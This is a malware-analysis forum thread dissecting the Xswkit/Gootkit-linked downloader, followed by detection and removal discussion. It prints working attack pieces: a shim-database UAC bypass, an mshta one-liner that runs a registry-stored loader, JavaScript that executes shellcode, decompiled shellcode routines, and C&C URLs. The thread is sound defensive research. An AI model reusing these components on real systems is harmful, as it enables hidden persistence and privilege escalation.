A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24808  by EP_X0FF
 Sat Jan 03, 2015 12:24 pm
Credits for sample to Tigzy and R136a1, preliminary analysis done by R136a1.

Win32/Xswkit is another clone of Win32/Poweliks but with number of additions, such as embedded UAC bypass and different startup method (rundll + mshta.exe). Purpose: malware downloader.

Update 04/01/2015
See http://www.kernelmode.info/forum/viewto ... 827#p24827

UAC bypass is similar to used by Gootkit, reconstructed can be found -> here.

During installation Xswkit builds shim database patch, drops it to %temp% folder and executes sdbinst with -q parameter and path to new database. Entry itself is shim RedirectEXE
Code: Select all
 <DATABASE tid="0xf0" typ="LIST">
  <TIME tid="0xf6" typ="QWORD">0x1d014b31a06ce99</TIME>
  <COMPILER_VERSION tid="0x100" typ="STRINGREF">2.1.0.3</COMPILER_VERSION>
  <NAME tid="0x106" typ="STRINGREF">qrywI9lBMKdLH</NAME>
  <OS_PLATFORM tid="0x10c" typ="DWORD">0x1</OS_PLATFORM>
  <DATABASE_ID tid="0x112" typ="BINARY" len="0x10" guid="1AC61212-7AC0-464A-8B9815BC2854072E" />
  <LIBRARY tid="0x128" typ="LIST">
  </LIBRARY>
  <EXE tid="0x12e" typ="LIST">
   <NAME tid="0x134" typ="STRINGREF">cliconfg.exe</NAME>
   <APP_NAME tid="0x13a" typ="STRINGREF">nv0NK43fWQ</APP_NAME>
   <VENDOR tid="0x140" typ="STRINGREF">Microsoft</VENDOR>
   <EXE_ID tid="0x146" typ="BINARY" len="0x10" guid="E6D3E2BF-6CBF-0C43-B41AA519B962860C" />
   <MATCHING_FILE tid="0x15c" typ="LIST">
    <NAME tid="0x162" typ="STRINGREF">*</NAME>
    <COMPANY_NAME tid="0x168" typ="STRINGREF">Microsoft Corporation</COMPANY_NAME>
    <INTERNAL_NAME tid="0x16e" typ="STRINGREF">cliconfg.exe</INTERNAL_NAME>
   </MATCHING_FILE>
   <SHIM_REF tid="0x174" typ="LIST">
    <NAME tid="0x17a" typ="STRINGREF">RedirectEXE</NAME>
    <COMMAND_LINE tid="0x180" typ="STRINGREF">"C:\Malware\1.exe" -z "C:\Users\UserMan\AppData\Local\Temp\AF293.tmp"</COMMAND_LINE>
   </SHIM_REF>
  </EXE>
 </DATABASE>
Image

So malware installation steps are following:

1) generate SDB shim patch and drop it to %temp% folder
2) register shim with sdbinst (no UAC prompt on default UAC settings)
3) run target application -> cliconfg.exe, terminate itself
4) cliconfg.exe (no UAC prompt on default UAC settings) executes malicious shim and starts malware dropper again with given commandline arguments
5) dropper installs itself to the system with full admin rights

Below is R136a1 analysis he was so kind to share.
R136a1 wrote: 1) Set value in Registry:
Key: HKEY_CURRENT_USER\Software
Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

2) Create Key and set values in Registry:
Key: HKEY_CURRENT_USER\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code

3) Create new process C:\WINDOWS\system32\svchost.exe (Process hijack)

4) Exit old process

5) Set value in Registry:
Key: HKEY_CURRENT_USER\Software
Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

6) Create Key and set values in Registry:
Key: HKEY_USERS\.DEFAULT\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

7) Create Key and set values in Registry:
Key: HKEY_USERS\S-1-5-19\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

8) Create Key and set values in Registry:
Key: HKEY_USERS\S-1-5-20\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

9) Download and install a lot of root certificates

10) Set values in Registry:
Key: HKEY_CURRENT_USER\Software
Value: binaryImage32_0...binaryImage32_5 (REG_BINARY)
Data: ...

11) Inject code into explorer.exe (+ firefox.exe + iexplore.exe after opening)

??? 12) ESENT.dll loading by injected processes ???

13) Create Key and set values in Registry:
Key: HKEY_CURRENT_USER\Software\cxsw
Value: {c1e2bc64-8d94-461f-a485-50a7322bfb4a} (REG_BINARY)
Data: ...
Value: {da14b39e-535a-4b08-9d68-ba6d14fed630} (REG_BINARY)
Data: ...
R136a1 wrote:More from mutex {a1ba4f72-9762-4864-8889-478ac3bdb354}:
https://www.virustotal.com/en/file/658c ... /analysis/
https://www.virustotal.com/en/file/2baf ... /analysis/

More from registry value {d42d0afb-3638-4326-b67b-b0cb954fba94}:
http://totalhash.com/analysis/efd11b782 ... 0c804ece07
http://totalhash.com/analysis/dded6ea73 ... cc5b32bcc5
http://totalhash.com/analysis/0bd288047 ... 9f02b2befa
http://totalhash.com/analysis/258fc44bd ... ee5850c9c1
http://www.threatexpert.com/report.aspx ... e1c1d8b956
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
R136a1 wrote:Malware uses Windows tool mshta.exe and DynamicWrapperX:
http://yuripopov.ucoz.net/index/dwx_reg ... de_en/0-27
Lets continue.

Loader script is very huge (144kb) as it contains copy of mshta.exe, dynwrapx.dll, their manifests and shellcode, everything you will find in attach.

How malware operates after reboot.

It runs from Software\Microsoft\Windows\CurrentVersion\Run key by rundll32 which executes the following
Code: Select all
mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"
Hidden window with script that does next loading stage.

Once executed it performs the following piece of code read from loader registry value at previous stage
Code: Select all
try {
	var DWX = new ActiveXObject(\"DynamicWrapperX\");
	ExecuteShellCode();
	function ExecuteShellCode(){
		var CodeAddr = DWX.RegisterCode(ShellcodeHexStr, \"executeCode\", \"i=l\", \"r=l\");
		DWX.executeCode(0);
	}

	Exit();

} catch(e) {
	SetupDWX();
}
It attempts to create new ActiveXObject "DynamicWrapperX" which allows code execution, if it failed then it installs this additions in SetupDWX routine.
Code: Select all
function SetupDWX()
{
	if (!FileExists(DefaultDir+\"mshta.exe\")) UnpackResource(\"mshta.exe\", DefaultDir +\"mshta.exe\");
	if (!FileExists(DefaultDir+\"dynwrapx.dll\")) UnpackResource(\"dynwrapx.dll\", DefaultDir +\"dynwrapx.dll\");
	if (!FileExists(DefaultDir+\"dynwrapx.sxs.manifest\")) UnpackResource(\"dynwrapx.sxs.manifest\", DefaultDir +\"dynwrapx.sxs.manifest\");
	if (!FileExists(DefaultDir+\"mshta.exe.manifest\")) UnpackResource(\"mshta.exe.manifest\", DefaultDir +\"mshta.exe.manifest\");

	WshShell.Run('\"'+DefaultDir+\"mshta.exe\\\" \\\"\"+HTARunCommand+'\"',0,0);
	Exit();
}
Shellcode section also read from loader registry key and this is a final malware startup stage. Main purpose of it - read actual malware body stored in registry as binaryImageXX value data (where XX is platform -32 or 64), start suspended svchost.exe, unmap it original code, map malicious payload and run it.

Shellcode uses API hashing and global shellcode description structure, dynamically allocated during execution.

Below is API hashing function
Code: Select all
unsigned long get_hash(char *s)
{
	unsigned long v1 = 0x1505;

	while (*s != 0) {
		v1 += *(unsigned char *)s + (v1 << 5);
		s++;
	}
	return v1;
}
shell context allocation routine
Code: Select all
struct_v23 *__cdecl CreateShellContext()
{
  int hUser32; // eax@4
  int v1; // eax@4
  int v2; // eax@4
  int v4; // [sp+0h] [bp-50h]@1
  int v5; // [sp+4h] [bp-4Ch]@1
  int v6; // [sp+8h] [bp-48h]@1
  int v7; // [sp+Ch] [bp-44h]@1
  int v8; // [sp+10h] [bp-40h]@1
  int v9; // [sp+14h] [bp-3Ch]@1
  int v10; // [sp+18h] [bp-38h]@1
  int szAdvapi32; // [sp+1Ch] [bp-34h]@1
  int v12; // [sp+20h] [bp-30h]@1
  int v13; // [sp+24h] [bp-2Ch]@1
  int v14; // [sp+28h] [bp-28h]@1
  int szNtdll; // [sp+2Ch] [bp-24h]@1
  int v16; // [sp+30h] [bp-20h]@1
  int v17; // [sp+34h] [bp-1Ch]@1
  int szUser32; // [sp+38h] [bp-18h]@1
  int v19; // [sp+3Ch] [bp-14h]@1
  int v20; // [sp+40h] [bp-10h]@1
  int VirtualAlloc; // [sp+44h] [bp-Ch]@2
  int hKernel32; // [sp+48h] [bp-8h]@1
  struct_v23 *shell_ctx; // [sp+4Ch] [bp-4h]@1

  shell_ctx = 0;
  v4 = 'e\0k';
  v5 = 'n\0r';
  v6 = 'l\0e';
  v7 = '2\03';
  v8 = 'd\0.';
  v9 = 'l\0l';
  v10 = 0;
  hKernel32 = GetModuleHandle(&v4);
  szNtdll = 'ldtn';
  v16 = 'ld.l';
  v17 = 'l';
  szAdvapi32 = 'avda';
  v12 = '23ip';
  v13 = 'lld.';
  v14 = 0;
  szUser32 = 'resu';
  v19 = 'd.23';
  v20 = 'll';
  if ( hKernel32 )
  {
    VirtualAlloc = ApiFromHash(hKernel32, 0x382C0F97u);
    if ( VirtualAlloc )
    {
      shell_ctx = (VirtualAlloc)(0, 0xC4u, 0x3000u, 64);
      if ( shell_ctx )
      {
        shell_ctx->hKernel32 = hKernel32;
        shell_ctx->VirtualAlloc = VirtualAlloc;
        shell_ctx->VirtualFree = ApiFromHash(shell_ctx->hKernel32, 0x668FCF2Eu);
        shell_ctx->Sleep = ApiFromHash(shell_ctx->hKernel32, 0xE19E5FEu);
        shell_ctx->LoadLibraryExA = ApiFromHash(shell_ctx->hKernel32, 0x4F803C78u);
        shell_ctx->CreateThread = ApiFromHash(shell_ctx->hKernel32, 0x7F08F451u);
        shell_ctx->lstrlenA = ApiFromHash(shell_ctx->hKernel32, 0xD2C4AB0Au);
        shell_ctx->GetProcAddress = ApiFromHash(shell_ctx->hKernel32, 0xCF31BB1Fu);
        shell_ctx->LocalFree = ApiFromHash(shell_ctx->hKernel32, 0xA66DF372u);
        shell_ctx->CloseHandle = ApiFromHash(shell_ctx->hKernel32, 0x3870CA07u);
        shell_ctx->GetCurrentProcess = ApiFromHash(shell_ctx->hKernel32, 0xCA8D7527u);
        shell_ctx->ExpandEnvironmentStringsW = ApiFromHash(shell_ctx->hKernel32, 0x7487495Bu);
        shell_ctx->CreateProcessW = ApiFromHash(shell_ctx->hKernel32, 0xAEB52E2Fu);
        shell_ctx->GetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0xEBA2CFC2u);
        shell_ctx->ReadProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0xB8932459u);
        shell_ctx->lstrcatW = ApiFromHash(shell_ctx->hKernel32, 0xD2BFAB79u);
        shell_ctx->ResumeThread = ApiFromHash(shell_ctx->hKernel32, 0x74162A6Eu);
        shell_ctx->SetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0x7E20964Eu);
        shell_ctx->VirtualProtectEx = ApiFromHash(shell_ctx->hKernel32, 0xD812922Au);
        shell_ctx->WriteProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0x6F22E8C8u);
        shell_ctx->VirtualAllocEx = ApiFromHash(shell_ctx->hKernel32, 0xF36E5AB4u);
        shell_ctx->hNtdll = shell_ctx->LoadLibraryExA(&szNtdll, 0, 0);
        shell_ctx->RtlCreateHeap = ApiFromHash(shell_ctx->hNtdll, 0xAFAAC189u);
        shell_ctx->RtlAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xC0B381DAu);
        shell_ctx->RtlReAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xBBC97911u);
        shell_ctx->RtlFreeHeap = ApiFromHash(shell_ctx->hNtdll, 0x70BA71D7u);
        shell_ctx->NtTerminateThread = ApiFromHash(shell_ctx->hNtdll, 0xAC3C9DC8u);
        shell_ctx->RtlDecompressBuffer = ApiFromHash(shell_ctx->hNtdll, 0xF73BBD46u);
        shell_ctx->NtOpenKey = ApiFromHash(shell_ctx->hNtdll, 0x4BB73E02u);
        shell_ctx->wcslen = ApiFromHash(shell_ctx->hNtdll, 0x24B549F1u);
        shell_ctx->NtUnmapViewOfSection = ApiFromHash(shell_ctx->hNtdll, 0x595014ADu);
        shell_ctx->hAdvapi32 = shell_ctx->LoadLibraryExA(&szAdvapi32, 0, 0);
        shell_ctx->RegOpenKeyExW = ApiFromHash(shell_ctx->hAdvapi32, 0x74A9772u);
        shell_ctx->ConvertSidToStringSidW = ApiFromHash(shell_ctx->hAdvapi32, 0x99A22DD7u);
        shell_ctx->RegSetValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x345872EAu);
        shell_ctx->RegQueryValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x6B95D114u);
        shell_ctx->RegOpenKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x74A975Cu);
        shell_ctx->RegCreateKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x46CEB39Eu);
        shell_ctx->RegCloseKey = ApiFromHash(shell_ctx->hAdvapi32, 0x736B3702u);
        shell_ctx->RegEnumKeyA = ApiFromHash(shell_ctx->hAdvapi32, 0xF367EA22u);
        shell_ctx->OpenProcessToken = ApiFromHash(shell_ctx->hAdvapi32, 0xC57BD097u);
        shell_ctx->GetTokenInformation = ApiFromHash(shell_ctx->hAdvapi32, 0x8ED47F2Cu);
        shell_ctx->IsValidSid = ApiFromHash(shell_ctx->hAdvapi32, 0x3D180391u);
        hUser32 = (shell_ctx->LoadLibraryExA)(&szUser32, 0, 0);
        shell_ctx->MessageBoxA = ApiFromHash(hUser32, 0x384F14B4u);
        shell_ctx->wsprintfA = ApiFromHash(hUser32, 0xF898B8C3u);
        shell_ctx->wsprintfW = ApiFromHash(hUser32, 0xF898B8D9u);
        shell_ctx->hHeap = shell_ctx->RtlCreateHeap(2, 0, 0, 0, 0);
      }
    }
  }
  return shell_ctx;
}
and svchost spawning code

Image

Strings from actual malware
Code: Select all
RtlCreateUserThread NtClose InternetReadFile    HttpOpenRequestA    InternetCloseHandle HttpSendRequestA    InternetOpenA   InternetConnectA    HttpQueryInfoA  InternetQueryOptionA    InternetSetOptionA  InternetSetFilePointer  HttpAddRequestHeadersA  L a s t H a r d w a r e H a s h     b i n a r y I m a g e % d   % s _ % d   \ R E G I S T R Y \ U S E R \ % s   \ R e g i s t r y \ U s e r     % S y s t e m R o o t % \ S y s t e m 3 2 \ n t d l l . d l l   RtlDecompressBuffer ntdll.dll   RtlComputeCrc32 a p p h e l p . d l l   SdbBeginWriteListTag    SdbCloseDatabase    SdbCloseDatabaseWrite   SdbCommitIndexes    SdbCreateDatabase   SdbDeclareIndex SdbEndWriteListTag  SdbFindFirstDWORDIndexedTag SdbFindFirstTag SdbFindNextTag  SdbFormatAttribute  SdbFreeFileAttributes   SdbGetAppPatchDir   SdbGetBinaryTagData SdbGetFileAttributes    SdbGetFirstChild    SdbGetIndex SdbGetMatchingExe   SdbGetNextChild SdbGetStringTagPtr  SdbGetTagFromTagID  SdbInitDatabase SdbIsStandardDatabase   SdbMakeIndexKeyFromString   SdbOpenApphelpDetailsDatabase   SdbOpenApphelpResourceFile  SdbOpenDatabase SdbQueryDataExTagID SdbReadApphelpDetailsData   SdbReadBinaryTag    SdbReadDWORDTag SdbReadQWORDTag SdbReadStringTag    SdbRegisterDatabaseEx   SdbReleaseDatabase  SdbReleaseMatchingExe   SdbStartIndexing    SdbStopIndexing SdbTagRefToTagID    SdbTagToString  SdbUnregisterDatabase   SdbWriteBinaryTag   SdbWriteBinaryTagFromFile   SdbWriteDWORDTag    SdbWriteNULLTag SdbWriteQWORDTag    SdbWriteStringTag   SdbWriteWORDTag ShimFlushCache  BaseFlushAppcompatCache generic unknown error   iostream    iostream stream error   system  2 . 1 . 0 . 3   dж@ °H@ PI@ `I@ РH@ 0I@ рH@ з@ °H@ рI@ `I@  J@ 0I@ рH@ Дж@ °H@ ђI@  I@ РH@ 0I@ рH@ °ж@ °H@ 0@ 0@ РH@ 0I@ рH@ SHGetKnownFolderPath    Shell32.dll SHGetSpecialFolderPathW     \ R e g i s t r y \ M a c h i n e \ S o f t w a r e \ M i c r o s o f t \ C r y p t o g r a p h y   M a c h i n e G u i d       \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e \ A p p D a t a L o w   \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e     \ R E G I S T R Y \ U S E R \ % s \ % s     S e R e s t o r e P r i v i l e g e     dз@ pm@ - z     c l i c o n f g . e x e     s d b i n s t . e x e       a b c d e f g h i j k l m n o p q r s t v u w x y z A B C D E F G H I J K L M N O P Q R S T U V W 0 1 2 3 4 5 6 7 8 9 _         A   S y s W O W 6 4     s y s t e m 3 2     \   M i c r o s o f t   R e d i r e c t E X E   M i c r o s o f t   C o r p o r a t i o n   *   "       "       - q   " % s "   - q   - u   " % s "     r u n a s   IsWow64Process  k e r n e l 3 2 . d l l     explorer.exe    chrome.exe  opera.exe   iexplore.exe    lsass.exe   firefox.exe LoadLibraryExA  kernel32.dll    GetProcAddress  VirtualProtect  VirtualAlloc    CreateThread    VirtualQuery    ZwOpenProcess   % S y s t e m R o o t % \ S y s t e m 3 2 \     b i n a r y I m a g e 3 2   l o a d e r     { d 4 2 d 0 a f b - 3 6 3 8 - 4 3 2 6 - b 6 7 b - b 0 c b 9 5 4 f b a 9 4 }     w i n d i r     % s \ s y s t e m 3 2 \ c m d . e x e     / c   " s t a r t   % s "     d e s k t o p . i n i   { 2 7 3 b 5 8 8 4 - 3 6 2 d - 4 f f 7 - 8 d 6 5 - 6 4 a c 2 e 7 f c 2 9 1 }     \ h u i     % s \ h u i % d . e x e     { a 1 b a 4 f 7 2 - 9 7 6 2 - 4 8 6 4 - 8 8 8 9 - 4 7 8 a c 3 b d b 3 5 4 }     \ s v c h o s t . e x e     s v c h o s t . e x e                   @      @   LdrGetProcedureAddress  NtAllocateVirtualMemory NtFreeVirtualMemory NtWriteVirtualMemory    H                                                      F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb
No actual name except
F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb
I'm curious when they realize that /DEBUG option should be turned off in release builds.

Original dropper, unpacked malware, full loader text and extracted shellcode in attach.

VT
original
https://www.virustotal.com/en/file/ed3d ... 420287664/

unpacked
https://www.virustotal.com/en/file/c388 ... 420287667/

No actual detection only trash.

P.S.
+ actual loading screenshot, as you can see Sysinternals Autoruns cannot recognize this entry as rogue, more to say if you select Verify Digital Signatures it will list it as totally legit.

Image
Attachments
pass: infected
(301.16 KiB) Downloaded 191 times
 #24811  by Tigzy
 Sat Jan 03, 2015 1:38 pm
I don't find any protection/watchdog protecting the persistence item (Run key). I'm able to manually remove it from regedit, and after a reboot the infection is gone.
Am I just lucky? :?:
 #24812  by Kafeine
 Sat Jan 03, 2015 2:00 pm
From what i understand the team behind this is the gootkit team and are focused on France since months.
The loader I saw tied to this team were pushed in Angler (directly) or in Bedep (after Angler Fileless).

Illustration.

Here on the 2014-09-23
Image
C&C call back :
https://transferringcert .com/rbody32

Associated sample : c8bfbc4f2eae6aca111a218c93be7bfd 148k (can't tell if it's already what you are calling Xswkit but Horgh spotted those Strings in it in september:
.text:00407AC8 0000004A C F:\\Devel\\usermode-rootkit\\usermode-rootkit\\bin\\usermode-rootkit_Win32.pdb
)

Here is another example on the 2014-10-15 :
Image
C&C call back;
https://localsea .org /bootcode
https://localsea .org/driver32 (same as rbody)

Associated sample : 61c2c96ae36ccda1854523a1352ce523 102k

And one more on the 2014-12-10 :
Image

c05453a18b6dc45bc258a377d2161b1c - 508k
Samples associated to that infection vector :
f5fb91684ea1f8cdfaeaa54e70737cab 236k
04a03d1329efa04a3e60a04ddadf9715 148k


C&C Call back :
https://spaceministrer .com/rbody32
https://spaceministrer .com/rbody64
Attachments
Gootkit Package. Password: infected
(919.47 KiB) Downloaded 107 times
 #24813  by EP_X0FF
 Sat Jan 03, 2015 2:24 pm
Tigzy wrote:I don't find any protection/watchdog protecting the persistence item (Run key). I'm able to manually remove it from regedit, and after a reboot the infection is gone.
Am I just lucky? :?:
No only you, it removes with simple Autoruns (just turn off default Microsoft filter to see this infection) in one click.

Overall this malware looks a bit... under construction. For example this shellcode has support for "binaryImage64" registry data loading (that's why I named it WinNT), but it is unused because routine responsible for registry payload extraction always take 0x20 (32) as execution mode parameter, also some routines from shellcode context seems totally unused. There is no obfuscation for loader scripts too. Executable build date indicates it was compiled in the beginning of December 2014. Also pdb string name indicates there should be some hmmm "rootkit" capabilities, but nothing like this found.
 #24815  by Tigzy
 Sat Jan 03, 2015 2:32 pm
Ok, thanks for confirmation.
The customer that reported the problem said after removing the Run key the infection was back after a reboot. Which I can't reproduce. Seems weird, I'll ask to double check.
 #24816  by Tigzy
 Sat Jan 03, 2015 2:46 pm
Possible hooks made by the malware:
(No hooks are found when the malware isn't loaded)
¤¤¤ Processus : 4 ¤¤¤
[Tr.Gootkit] explorer.exe -- C:\WINDOWS\Explorer.EXE[7] -> [NoKill]
[Tr.Gootkit] svchost.exe -- C:\WINDOWS\System32\svchost.exe[x] -> [NoKill]
[Proc.Svchost] svchost.exe -- C:\WINDOWS\System32\svchost.exe[7] -> [NoKill]
[Tr.Gootkit] firefox.exe -- C:\Program Files\Mozilla Firefox\firefox.exe[7] -> [NoKill]

¤¤¤ Registre : 14 ¤¤¤
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Trouvé(e)

¤¤¤ Antirootkit : 4 (Driver: Chargé) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x31939ba (jmp 0xffffffff8684f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - NtDeviceIoControlFile : Unknown @ 0x1ecfa65 (jmp 0xffffffff855b2852|jmp 0x39|call 0xffffffffffffff3e)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x1e839ba (jmp 0xffffffff8553f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) DNSAPI.dll - DnsQuery_W : Unknown @ 0x1ecf8d0 (jmp 0xffffffff8affcb3c)
 #24817  by EP_X0FF
 Sat Jan 03, 2015 2:59 pm
Tigzy wrote:Ok, thanks for confirmation.
The customer that reported the problem said after removing the Run key the infection was back after a reboot. Which I can't reproduce. Seems weird, I'll ask to double check.
You posted above list of various autostart locations from HKEY_USERS, they and all the bot data in xsw/cxsw keys still need to be removed even if malware isn't loaded.

This hook RtlPcToFileHeader is definitely from Xswkit, because it points directly to injected into explorer.exe malware binary.
 #24818  by Tigzy
 Sat Jan 03, 2015 3:03 pm
Yeah of course, he (I think) removed the run key for the current user, which is the persistence item.
RtlPcToFileHeader: Any idea why it needs to filter that one?

EDIT: The log I posted isn't from the customer, it's from a RogueKiller beta version I just compiled with new signatures.
 #24819  by EP_X0FF
 Sat Jan 03, 2015 3:28 pm
Tigzy wrote:RtlPcToFileHeader: Any idea why it needs to filter that one?
If your injected code will trigger exception then try/except will not work because your module is not in loader list and this is checked by SEH with RtlPcToFileHeader. By hooking this routine this one can force SEH to work.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 7